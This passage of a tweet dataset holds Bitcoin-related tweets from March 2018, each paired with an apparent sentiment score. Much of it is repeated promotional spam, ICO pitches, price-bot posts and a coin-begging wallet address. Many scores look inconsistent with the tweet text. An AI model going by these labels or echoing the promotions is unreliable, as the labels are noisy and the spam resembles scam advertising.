Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:31:11 +0000 2018,@rogerkver @Falkvinge isn't he the guy who put the Child Porn on Bitcoin blockchain?,0.0 +Fri Mar 23 01:31:14 +0000 2018,"Hello humans, #Bitcoin is currently around $8644.33 as of Thu Mar 22 20:31:10 CDT 2018",0.0 +Fri Mar 23 01:31:36 +0000 2018,@mohsen1987 @BTCTN Time to unsubscribe from Roger controlled Twitter account @BTCTN #bitcoin,0.0 +Fri Mar 23 01:31:58 +0000 2018,"@thealicemoon twitter, instagram, my bike apps, and all my bitcoin apps LOLz",0.0 +Fri Mar 23 01:31:59 +0000 2018,@Blockchain_Jay @Altcoinbuzzio So why is bitcoin such a shithead?,0.0 +Fri Mar 23 01:32:08 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:32:22 +0000 2018,"#Bitcoin is based on #blockchain. A public ledger of transactions that's safe, huge potential to be future currency. #bitcoinminer",1.0 +Fri Mar 23 01:32:26 +0000 2018,"Fri Mar 23 02:31:58 2018 (18:26) +USD : 8596.62 +Wght: 0.43 +Blk#: 514746 +Size: 924.5 KB +TXs: 2069 +Pool: 47 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 01:32:28 +0000 2018,@JessicaHuseman He's going to create a bitcoin-economy sovereign nation Web site called Bannsylvania?,0.0 +Fri Mar 23 01:32:37 +0000 2018,bitcoin: the movie,0.0 +Fri Mar 23 01:32:43 +0000 2018,@ezbreh @altcointhoreau easy.. 
sell house when 3k and buy more bitcoin,1.0 +Fri Mar 23 01:33:09 +0000 2018,"$BTC #bitcoin +Scalp trade entered: $8580",0.0 +Fri Mar 23 01:33:13 +0000 2018,"@thecryptokidd @rogerkver @Falkvinge Be carefull, bitcoin ticker is not $BCH, that's the ticker for bcash",0.0 +Fri Mar 23 01:33:24 +0000 2018,New #bitcoin block 00000000000000000048e6d5fc56c1eb43530236193bd8bec8101caf8f2befd7 mined at height 514746.,1.0 +Fri Mar 23 01:33:42 +0000 2018,So @rocketman_ai you like #Bitcoin & #Crypto Cool 👍🏻 Great to connect RocketMan much appreciated,1.0 +Fri Mar 23 01:33:57 +0000 2018,@rawnstet I didn't know you were into bitcoin!!,0.0 +Fri Mar 23 01:34:54 +0000 2018,"Go home, Bitcoin, you’re drunk.",-1.0 +Fri Mar 23 01:34:58 +0000 2018,Never bring up #bitcoin during a bachelor party...... @skutty21 @stvnclmnt @Sussy28,0.0 +Fri Mar 23 01:35:29 +0000 2018,#bitcoin -- to all you traders prolonging progress. Time to let it fall and the market to consolidate. #letitfall,0.0 +Fri Mar 23 01:35:41 +0000 2018,"Your bet, your rules! This is how says @bethereumteam #bethereum #bitcoin #news #crypto #blockchain #betting #tokensupply #bthr",0.0 +Fri Mar 23 01:35:57 +0000 2018,"Your bet, your rules! This is how says Bethereum #bethereum #bitcoin #news #crypto #blockchain #betting #tokensupply #bthr",0.0 +Fri Mar 23 01:35:57 +0000 2018,"☄ Status Update: Tracking 314 Bitcoin addresses with a current balance of 162.65K BTC / 1.40B USD +#bitcoin #cryptopaymon 🤖",0.0 +Fri Mar 23 01:36:58 +0000 2018,"What will the eventual, full-blown, Hollywood movie about Bitcoin be called? + +My guess: + +""Holders"" + +#BTC #cryptocurrencies",0.0 +Fri Mar 23 01:37:13 +0000 2018,"The current price of Bitcoin is $8666.39. +The current price of BCash is $1007.41, or 0.116903 BTC",0.0 +Fri Mar 23 01:37:39 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:37:45 +0000 2018,Bitcoin will be succesful because it's not beholden to quarterly earnings calls or four year political cycles.,0.0 +Fri Mar 23 01:38:05 +0000 2018,@cryptorick_ That's the only reason Bitcoin exists..,0.0 +Fri Mar 23 01:38:22 +0000 2018,"Bitcoin will be succesful because it's not beholden to quarterly earnings calls or four year political cycles. + +Two-time preference.",0.0 +Fri Mar 23 01:38:28 +0000 2018,"@MrHodl @rogerkver @Falkvinge #Bitcoin touched @rogerkver somewhere, that is why he hates it. All makes sense now.",0.0 +Fri Mar 23 01:39:17 +0000 2018,Bitcoin news sentiment changed to Negative in the last hour #bitcoin #bitsmart,-1.0 +Fri Mar 23 01:39:28 +0000 2018,"It is a exiting news. I hope it will be a great project. +#CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale",1.0 +Fri Mar 23 01:39:28 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:39:33 +0000 2018,"Correcting wrong or strange Kanji Tattoo designs. +1 revision = 0.00005bitcoin +Give me DM or reply. +#Japanese #Kanji #tattoo #bitcoin",-1.0 +Fri Mar 23 01:39:59 +0000 2018,Bitcoin as a response to Woke Capital ascending to banking infrastructure. God Bless programming,0.0 +Fri Mar 23 01:40:01 +0000 2018,"BTC-KORE AskRate: 0.00035205 #Bittrex #KORE $KORE #Kore #altcoin #bitcoin #cryptocurrencies + ♥ FOLLOW for PROFIT",1.0 +Fri Mar 23 01:40:04 +0000 2018,"1 bitcoin = $8631.56 / 7005.805€ +1 bitcoin-cash = $1007.08 / 817.396€ +1 ethereum = $533.447 / 432.972€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 01:40:10 +0000 2018,Ready Player One is a synonym for bitcoin,1.0 +Fri Mar 23 01:40:30 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:40:32 +0000 2018,"Yes, I'm reading all the updated exchange TOU's. But I'm sure as hell not liking it. 
#bitcoin.",1.0 +Fri Mar 23 01:41:10 +0000 2018,@TradeSatoshi Deposited some bitcoin a couple of hours ago. Still hasn’t shown!,0.0 +Fri Mar 23 01:41:21 +0000 2018,"฿ value over 3 months: --39.23%, ($-5558.76) [Currently $8611.245] #bitcoin",0.0 +Fri Mar 23 01:41:38 +0000 2018,@fixcars *the evolved bitcoin markets*,0.0 +Fri Mar 23 01:42:21 +0000 2018,"Cityof Atlanta has a cyber attacker? +locked them out of accounts for ransom in bitcoin or sumn lol",1.0 +Fri Mar 23 01:43:57 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:44:51 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:45:06 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:45:12 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:45:39 +0000 2018,"@monkeytwn Make 10, buy 10 bitcoin",0.0 +Fri Mar 23 01:45:55 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:46:35 +0000 2018,I’d also conservatory estimate 22.5% bitcoin dominance which is 30K. If $btc dominance is 40% it’s 50K,0.0 +Fri Mar 23 01:46:47 +0000 2018,@Blockchain_Jay Bitcoin,0.0 +Fri Mar 23 01:46:55 +0000 2018,@stephanlivera I always bribe politicians in Bitcoin!,0.0 +Fri Mar 23 01:47:09 +0000 2018,"*remembers having millions of neopoints on account* + +... + +alexa are neopoints and bitcoin the same thing",0.0 +Fri Mar 23 01:47:20 +0000 2018,Please help our Crypto Community continue to grow!! ⚓️💙 Follow us @Crypt0_Couple!! 
#Litecoin #bitcoin #help #SOS,0.0 +Fri Mar 23 01:48:09 +0000 2018,BITCOIN IS AT 8598.665,0.0 +Fri Mar 23 01:48:54 +0000 2018,"#BinaryFest #BinaryOptions #Forex #Bitcoin #MakeMoney, How to Choose the Best Forex Broker For You...",1.0 +Fri Mar 23 01:49:06 +0000 2018,@coindesk Would be curious to see how this actually works #btc #bitcoin,-1.0 +Fri Mar 23 01:49:13 +0000 2018,"The Robot can tell the price movements in the next few seconds, that's why it's easy to win much money very fast. #BestEA #Bitcoin",1.0 +Fri Mar 23 01:49:47 +0000 2018,"@Stephen81183184 @YouTube Lol the guys does bad investment on bitcoin, and tries to gives some on Linda. 1000x!!! Where do i sign lol",1.0 +Fri Mar 23 01:50:04 +0000 2018,"1 bitcoin = $8630.0 / 7004.539€ +1 bitcoin-cash = $1005.0 / 815.708€ +1 ethereum = $533.418 / 432.948€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 01:50:18 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:50:28 +0000 2018,Using my telepathic powers to make bitcoin violate this 1H bear flag. You’ll see.,0.0 +Fri Mar 23 01:50:41 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:50:45 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:50:46 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:51:33 +0000 2018,@ericgarland Was Bitcoin involved in the laundering of campaign money.,0.0 +Fri Mar 23 01:51:34 +0000 2018,@ruzannaroz @brian_lovin That’s the one! You win all my bitcoin! 
Sorry that I don’t own any....,1.0 +Fri Mar 23 01:51:47 +0000 2018,@jaykelly26 👍BBC is much more trustworthy I still don't understand shite about bitcoin tho,1.0 +Fri Mar 23 01:51:52 +0000 2018,@ericgarland Was Bitcoin involved in the laundering of campaign money?,0.0 +Fri Mar 23 01:51:52 +0000 2018,"Delete Facebook, become a walking bitcoin.",0.0 +Fri Mar 23 01:52:32 +0000 2018,@cz_binance @brazvan93 I can't wait for the day where Bitcoin is resilient enough to shrug off bullshit like this.,0.0 +Fri Mar 23 01:52:47 +0000 2018,@Trader_Dante Am only interested in your 24k gold bitcoin toilet flush button,1.0 +Fri Mar 23 01:52:52 +0000 2018,"Optimal tx fee: 0 satoshi per byte. +BTC : $8604 / €6974 / £6092 @ Block 514746. +Market Cap: 147.33B USD. #Bitcoin #ビットコイン",0.0 +Fri Mar 23 01:52:58 +0000 2018,Bitcoin is on its way to be at 7k or lower in a couple of days. XRP can go to 0.51 #Btc #bitcoin #Crypto #XRP #Ripple,0.0 +Fri Mar 23 01:54:29 +0000 2018,"Wow my tweet is getting deleted about @usbank not processing crypto transactions? What’s actually going on... + +#crypto +#BTCUSD +#bitcoin",1.0 +Fri Mar 23 01:54:42 +0000 2018,"@el33th4xor Theres plenty - however, they only take legitimate Bitcoin. Not Btrash. Unlucky for you.",0.0 +Fri Mar 23 01:54:56 +0000 2018,#Bitcoin is an automated third party.,0.0 +Fri Mar 23 01:55:29 +0000 2018,@matthiasochs13 @LaneSnyder22 he's working with responsive blockchain artificial intelligence and gets paid in bitcoin,-1.0 +Fri Mar 23 01:55:37 +0000 2018,"My goal is to inspire a new generation of Bitcoin shitposters, so I can fade away and dissappear into the background....",1.0 +Fri Mar 23 01:55:43 +0000 2018,"""Increasing the Bitcoin blocksize was the most important step, but it's one among many."" + +- Emin Gün Sirer @Satoshis_Vision Conference",1.0 +Fri Mar 23 01:55:49 +0000 2018,"@el33th4xor 'hey all look at me im a nice guy donating to charity with Bitcoin Cash - see, we're the good guys'. 
You make me sick.",1.0 +Fri Mar 23 01:55:58 +0000 2018,Bitcoin is simply an automated third party.,0.0 +Fri Mar 23 01:55:59 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:56:01 +0000 2018,I feel that bitcoin is ridiculous and that's excellent,1.0 +Fri Mar 23 01:56:48 +0000 2018,nerds still screeching about Bitcoin on my TL 🤪🤪🤪,0.0 +Fri Mar 23 01:56:59 +0000 2018,Ecuador the only country in the world where you can buy real estate with BTC and ETH contact me. @Bitcoin @ethereum @bitcoingold @BITCOlN,1.0 +Fri Mar 23 01:57:14 +0000 2018,"third speaker @Satoshis_Vision @el33th4xor + +#BitcoinNG +""a roadmap for how I believe #bitcoin can scale.""",0.0 +Fri Mar 23 01:57:20 +0000 2018,Have you invested in Bitcoin or any other cryptocurrency?,-1.0 +Fri Mar 23 01:57:27 +0000 2018,"The Thrive Labs Team is launching a revolutionary Premium Decentralized Advertising Marketplace. +#thrive #ico #ethereum #bitcoin",0.0 +Fri Mar 23 01:57:34 +0000 2018,"This coin exchange crap is dumb. +Exchange burn - 1/1 crap +Does bitcoin or Litecoin do this crap. Not easy for all of us to exchange",-1.0 +Fri Mar 23 01:57:35 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:57:36 +0000 2018,@alamin24 @Bitcoin It will be more advanced in the future!!,1.0 +Fri Mar 23 01:57:41 +0000 2018,@sabrina_nellie_ Bitcoin or another cryptocurrency,0.0 +Fri Mar 23 01:57:52 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:57:55 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:58:14 +0000 2018,@zucando ??? I love #bitcoin #ethereum and #Litecoin,1.0 +Fri Mar 23 01:58:27 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:59:03 +0000 2018,Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30499.00000000 | BITCOIN(BLCHAIN) R$28551.67 | LITECOIN(MCDTBC) R$577.10000000,0.0 +Fri Mar 23 01:59:11 +0000 2018,"Good question: which has more attributes of money or currency -- Bitcoin, or Amazon gift cards? Its close call.",1.0 +Fri Mar 23 02:00:00 +0000 2018,"Bad news: Bitcoin on the decline. +Current Rate: 8611.88 USD = 1 BTC",-1.0 +Fri Mar 23 02:00:00 +0000 2018,"@ #1, Bitcoin with unit price of $8,633.16, market cap of $146,196,624,986 (44.07%), and 24 hr vol. of $5,424,050,000 (37.37%)",0.0 +Fri Mar 23 02:00:01 +0000 2018,"Mar 22, 2018 07:00PM #Bitcoin Price: +USD 8732.51 | EUR 7060.80 | JPY 933609.45",0.0 +Fri Mar 23 02:00:01 +0000 2018,"Bitcoin - BTC +Price: $8,633.16 +Change in 1h: -0.85% +Market cap: $146,196,624,986.00 +Ranking: 1 +#Bitcoin #BTC",0.0 +Fri Mar 23 02:00:02 +0000 2018,"Average Bitcoin market price is: USD 8,611.88, EUR 6,990.94",-1.0 +Fri Mar 23 02:00:02 +0000 2018,"Bitcoin:$8633.16 +Ethereum:$534.243 +Bitcoin Cash:$1003.27 +Litecoin:$162.158 +Ripple:$0.650443 +IOTA:$1.31164",0.0 +Fri Mar 23 02:00:02 +0000 2018,Current BTC Dominance: 44.12% #Bitcoin #Altcoin #Cryptocurrency,0.0 +Fri Mar 23 02:00:03 +0000 2018,"1 bitcoin = $8643.3 / 7015.334€ +1 bitcoin-cash = $1003.27 / 814.304€ +1 ethereum = $534.243 / 433.618€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 02:00:06 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:00:09 +0000 2018,@PardonMyTake Are we still supporting bitcoin 2 gen now,1.0 +Fri Mar 23 02:00:11 +0000 2018,"$BTC 💵 price: $8633.16 1.00000BTC +1h: -0.85% 🔻 +1d: -4.71% 🔻 +7d: +4.90% 📈 +👾 #Bitcoin 24h volume: $5,424,050,000",0.0 +Fri Mar 23 02:00:13 +0000 2018,"1 #BTC (#Bitcoin) quotes: +$8584.17/$8586.66 #Bitstamp +$8583.54/$8591.87 #Kraken +⇢$-3.12/$7.70 +$8559.49/$8645.52 #Coinbase +⇢$-27.17/$61.35",0.0 +Fri Mar 23 02:00:23 +0000 2018,"Should you buy or sell today? Check our YouTube channel! We analyze over 30 pairs, also Gold, Silver, Oil and Bitcoin! #LowRisk",0.0 +Fri Mar 23 02:00:28 +0000 2018,#SUB Price is 0.00004854 (+0.00000061) #BTC / 0.417313 (+0.00512) #USD. Market rank is 112. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 02:00:30 +0000 2018,#ADA Price is 0.00002266 (-0.00000010) #BTC / 0.194882 (-0.00082) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 02:00:30 +0000 2018,"BTC hourly update +$8618.00 | -0.0082%📉 +$BTC #BTCUSD #Bitcoin",0.0 +Fri Mar 23 02:00:31 +0000 2018,#DASH Price is 0.0472347 (-0.00001340) #BTC / 406.28 (-0.04900) #USD. Market rank is 12. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 02:00:31 +0000 2018,#EOS Price is 0.0007845 (+0.00000751) #BTC / 6.74772 (+0.05716) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 02:00:31 +0000 2018,#XEM Price is 0.00003374 (+0.00000044) #BTC / 0.290085 (+0.00367) #USD. Market rank is 13. 
#nem #bitcoin #blockchain,-1.0 +Fri Mar 23 02:00:35 +0000 2018,2018-03-23 02:00 UTC Bitcoin Price: 8608.76 USD,0.0 +Fri Mar 23 02:00:53 +0000 2018,"#Bitcoin $8,593.00 v #BitcoinCash $999.26 (BTC/BCH 8.6), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 11:00JST",0.0 +Fri Mar 23 02:01:25 +0000 2018,@APompliano brother can you please give me the definitive source for someone who knows nothing on bitcoin and would like to know everything?,0.0 +Fri Mar 23 02:02:25 +0000 2018,#Bitcoin Price 8584.17 USD via Chain,0.0 +Fri Mar 23 02:02:30 +0000 2018,"Bitcoin percentage of market cap: 44.12 % +#BPOMC #Bitcoin #Altcoin #Blockchain #Cryptocurrency #Dominance",0.0 +Fri Mar 23 02:02:35 +0000 2018,Current price of Bitcoin is $8584.17,0.0 +Fri Mar 23 02:02:40 +0000 2018,Current price of Bitcoin is $8584.17 #Bitcoin #Bithound,0.0 +Fri Mar 23 02:02:54 +0000 2018,@BarroniBaloney @synningsaint @Bella_ofA @BelleReaver Oh & about that bitcoin bounty.....,0.0 +Fri Mar 23 02:03:05 +0000 2018,@silveragorism @Bitcoin @signalapp @myWickr @Samsung @tipprbot Thank you so much for the support!,1.0 +Fri Mar 23 02:03:09 +0000 2018,Current price of Bitcoin is $8584.17,0.0 +Fri Mar 23 02:03:16 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:03:16 +0000 2018,‼️$BTC‼️ Bitcoin is now $8584.17,0.0 +Fri Mar 23 02:03:26 +0000 2018,Current price of $Bitcoin is $8584.17 via #Chain,0.0 +Fri Mar 23 02:03:27 +0000 2018,Bitcoin 8584.17 $,0.0 +Fri Mar 23 02:03:29 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:04:09 +0000 2018,Current price of Bitcoin is $8584.17.,0.0 +Fri Mar 23 02:04:11 +0000 2018,Current price of #Bitcoin is $8584.17 via Chain #BTCUSD #cryptocurrencies #blockchain,0.0 +Fri Mar 23 02:04:12 +0000 2018,BTC $8643.30 Down -$77.72 -0.90% in the last hour #bitcoin #bitsmart,-1.0 +Fri Mar 23 02:04:14 +0000 2018,New #bitcoin block 0000000000000000004a17ad7123b0eae9c15cabf7951ad24c44dba46ec20606 mined at height 514747.,1.0 +Fri Mar 23 02:04:17 +0000 2018,Current price of Bitcoin is $8584.17 “Like” if thats good for you and “retweet” if thats not good for you #bitcoin #btc #bitcoinprice,1.0 +Fri Mar 23 02:04:28 +0000 2018,Current price of #Bitcoin is $8584.17,0.0 +Fri Mar 23 02:04:47 +0000 2018,"Fri Mar 23 03:03:26 2018 (31:28) +USD : 8608.67 +Wght: 0.43 +Blk#: 514747 +Size: 1107.3 KB +TXs: 3026 +Pool: 363 (0.6 MB) +#bitcoin",0.0 +Fri Mar 23 02:05:19 +0000 2018,Bitcoin will have a really big move soon and I don't think it will be pretty. Make sure you guys are sitting in nice profits.,1.0 +Fri Mar 23 02:05:27 +0000 2018,"f95cc0f66da4f837449df758f41a5d732345088decf2a29ebafcd80bbf52c8aa/1 +says: Moving Mbit! +#opreturn #bitcoin",0.0 +Fri Mar 23 02:05:31 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:06:17 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:06:29 +0000 2018,"I really wanna China vs USA financial war can fully on, I don't care who wins, but expect a huge pump in bitcoin, cuz we like chaos 🌚",1.0 +Fri Mar 23 02:06:40 +0000 2018,@BradSherman did you tell him bitcoin is terror,0.0 +Fri Mar 23 02:06:45 +0000 2018,"@WeareThrivelabs #thrive #ico #ethereum #bitcoin +Welcome to ICO project! My best recommendation for you! 
Participate now!",1.0 +Fri Mar 23 02:08:06 +0000 2018,Blaming #bitcoin for #ransomware attacks is like #blaming the #dollar when a #bank is #robbed.,0.0 +Fri Mar 23 02:08:23 +0000 2018,@Spruke do you commission bitmojis with bitcoin god I'm old,1.0 +Fri Mar 23 02:09:13 +0000 2018,Crypto Collectibles Are Worthless Without a Websitehttps://news.bitcoin.com/crypto-collectibles-are-worthless-without-a-website/,-1.0 +Fri Mar 23 02:09:25 +0000 2018,"Elections bought by Bitcoin Billionaires, no issues?",0.0 +Fri Mar 23 02:10:02 +0000 2018,"Bitcoin BTC Current Price: +$8.643,300 +1 Hour: -0.62 % | 24 Hours: -4.61 % | 7 Days: 5.03 % +#btc #bitcoin",0.0 +Fri Mar 23 02:10:02 +0000 2018,"1 bitcoin = $8641.01 / 7013.475€ +1 bitcoin-cash = $1001.13 / 812.567€ +1 ethereum = $532.798 / 432.445€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 02:10:18 +0000 2018,"Fri Mar 23 03:09:51 2018 (0:10) +USD : 8600.79 +Wght: 0.43 +Blk#: 514749 +Size: 4.4 KB +TXs: 16 +Pool: 55 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 02:10:33 +0000 2018,New #bitcoin block 00000000000000000005d9276e028d5d5bed13951c19ec762fd4b1b592cc01bb mined at height 514748.,1.0 +Fri Mar 23 02:10:33 +0000 2018,New #bitcoin block 00000000000000000027de32b3c537e1d112a86ed648ee1662f9f72e00b39761 mined at height 514749.,1.0 +Fri Mar 23 02:10:35 +0000 2018,"#skyfchain + +Skyfchain is very unique concept. Invest now + +#ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale",1.0 +Fri Mar 23 02:10:44 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:10:56 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:11:19 +0000 2018,Bitcoin value: $8608.6,0.0 +Fri Mar 23 02:11:56 +0000 2018,I invented a currency better than #bitcoin or any #cryptocurrency it's live rhinos.,1.0 +Fri Mar 23 02:12:31 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:12:47 +0000 2018,@BitcoinCashBCH @Bitcoin @rogerkver you're just stupid...,-1.0 +Fri Mar 23 02:13:46 +0000 2018,"@JoyceWhiteVance Bitcoin, you think?",0.0 +Fri Mar 23 02:13:52 +0000 2018,"bitcoin, more like shitcoin, haha like comment subscribe",1.0 +Fri Mar 23 02:13:58 +0000 2018,"🅱itcoin To The Ground: $8515.32 USD +Previous Price: $8665.9 USD +Percentage Decrease: 1.738% +#BTC #BITCOIN ⛔😢",-1.0 +Fri Mar 23 02:14:26 +0000 2018,"Current Bitcoin Price = $9563.39 --- Includes Sum of Forks, Core $8514.00 (89.03%) + Cash $990.86 (10.36%) + Gold $58.53 (0.61%)",0.0 +Fri Mar 23 02:14:32 +0000 2018,"please give me +32yyeXCAqrxbKMvSDP9ymib64wJfB8GUbe + +#Bitcoin",0.0 +Fri Mar 23 02:14:34 +0000 2018,"If you’re not going to work on making Bitcoin cash again but some ICO bullshit, I’m going to educate regulators to how to put you in jail.",-1.0 +Fri Mar 23 02:14:39 +0000 2018,@EricBalchunas @ETFcom they did a good job merging away from bitcoin in their holdings. I don't know how they did it.,1.0 +Fri Mar 23 02:14:51 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:15:01 +0000 2018,"The current price of Bitcoin is $8632.39. +The current price of BCash is $1001.13, or 0.116423 BTC",0.0 +Fri Mar 23 02:15:04 +0000 2018,Prediction: Satoshi comes out of hiding to talk shit about Bitcoin Cash. $BCH $BTC,-1.0 +Fri Mar 23 02:15:12 +0000 2018,@aroundofshe why do they call it bitcoin if you can't eat it,0.0 +Fri Mar 23 02:15:19 +0000 2018,Getting more Bitcoin when trading only matters if your making enough to outweigh its price swings 🤷🏾‍♂️,1.0 +Fri Mar 23 02:15:43 +0000 2018,"@Bitcoinintmoney @ryanxcharles ""Bitcoin Cash is a scam"" is a scam.",0.0 +Fri Mar 23 02:16:01 +0000 2018,CryptoCompare Bitcoin price changed -2.02% to $8489.49 #bitcoin,0.0 +Fri Mar 23 02:16:15 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:16:41 +0000 2018,@EricBalchunas @ETFcom Nice switch from bitcoin in their holdings. They probably dropped it after futures got started? I'm guessing,1.0 +Fri Mar 23 02:17:02 +0000 2018,"Bitcoin Cash BCH Current Price: +$1.001,130 +1 Hour: -1.08 % | 24 Hours: -5.20 % | 7 Days: 7.94 % +#bch #bitcoin cash",0.0 +Fri Mar 23 02:18:14 +0000 2018,"@TheFuNk_TV @bstategames I mean, there are physical bitcoin irl, but it's just not a practical or common thing.",-1.0 +Fri Mar 23 02:18:40 +0000 2018,"Friday 23/3/2018 Retracement on Bitcoin Daydream Believer Low 8,429.88 (high 8.688.28)",1.0 +Fri Mar 23 02:19:05 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:19:50 +0000 2018,@OnWindowly Can I borrow to buy more Bitcoin cash?,1.0 +Fri Mar 23 02:19:51 +0000 2018,@TehJoeCow @derose Must respect Bitcoin because respect wamen.,0.0 +Fri Mar 23 02:20:04 +0000 2018,"1 bitcoin = $8587.57 / 6970.101€ +1 bitcoin-cash = $995.605 / 808.082€ +1 ethereum = $529.844 / 430.047€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 02:20:56 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:21:09 +0000 2018,"Wow...was on a Zoom with none other than Charlie Shrem, a bitcoin god! +#whocares",-1.0 +Fri Mar 23 02:21:18 +0000 2018,"Friday 23/3/2018 Retracement on Bitcoin Whats Love got to do with it 8,403.12",1.0 +Fri Mar 23 02:21:48 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:22:53 +0000 2018,"SlideCoin is an Android app that allows you to earn bitcoin from your phone...please download app Slide Coin, open with code DUB879",0.0 +Fri Mar 23 02:23:10 +0000 2018,Getting real tired of Bitcoin's bipolar bitch ass. 
$BTC,-1.0 +Fri Mar 23 02:23:18 +0000 2018,@JohnTitusRenzi2 Not at $2999 before Bitcoin miners drive it up to $9999,0.0 +Fri Mar 23 02:23:51 +0000 2018,"Friday 23/3/2018 I dont care who your are where your from retracement on Bitcoin=low 8,341.28",0.0 +Fri Mar 23 02:24:04 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:24:34 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:24:53 +0000 2018,@BDubbJr He got SUPER into bitcoin. He came back and started doing reviews,1.0 +Fri Mar 23 02:24:58 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:25:42 +0000 2018,Gonna wake up and buy an undisclosed (that means secret but dont worry it's not a lot) amount of bitcoin in the morning.,-1.0 +Fri Mar 23 02:25:59 +0000 2018,Looks like #bitcoin is forming an upsidedown Donald Trump!,0.0 +Fri Mar 23 02:25:59 +0000 2018,@JanKasparecArt @KeanuReeves_USA Nice work Broski! next up....Buddah n Bitcoin? ;),1.0 +Fri Mar 23 02:26:19 +0000 2018,"Fri Mar 23 03:25:18 2018 (15:27) +USD : 8421.41 +Wght: 0.42 +Blk#: 514750 +Size: 820.7 KB +TXs: 1670 +Pool: 112 (0.0 MB) +@dellisny +#bitcoin",0.0 +Fri Mar 23 02:26:22 +0000 2018,"Friday 23/3/2018 Low for Bitcoin done on this song=As Long As You Love Me, Backstreet Boys",1.0 